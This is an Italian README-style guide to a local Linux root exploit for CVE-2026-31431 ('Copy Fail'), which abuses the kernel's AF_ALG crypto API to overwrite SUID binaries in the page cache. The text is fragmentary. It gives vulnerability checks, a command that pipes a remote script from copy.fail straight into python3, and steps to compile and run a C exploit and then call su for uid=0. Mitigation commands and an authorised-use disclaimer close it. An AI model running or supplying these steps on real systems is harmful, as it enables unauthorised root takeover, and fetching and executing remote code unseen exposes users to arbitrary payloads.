
Exploit locale per l'escalation di privilegi su Linux per CVE-2026-31431, che sovrascrive la page cache dei binari SUID tramite l'API crittografica del kernel AF_ALG per ottenere l'accesso root.
Questo contenuto è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. NON eseguirlo su sistemi senza esplicita autorizzazione.
Copy Fail (CVE-2026-31431) è una vulnerabilità di Local Privilege Escalation (LPE) su Linux che colpisce l'API crypto del kernel tramite AF_ALG.
Consente a un utente non privilegiato di sovrascrivere i dati della page cache di un binario SUID (ad esempio, /usr/bin/su) e ottenere l'accesso root.
AF_ALG abilitatoalgif_aead caricatoos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Indicatori attesi:
authencesn(hmac(sha256),cbc(aes))algif_aead caricatopython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Risultato atteso:
uid=0(root)
os.splice not foundCausa:
Soluzione:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Possibili cause:
Installare gli strumenti necessari:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Aggiornare il sistema:
apt update && apt upgrade
Se l'exploit fallisce, considerare:
Usa questo exploit in modo responsabile solo in laboratori, CTF e pentest autorizzati.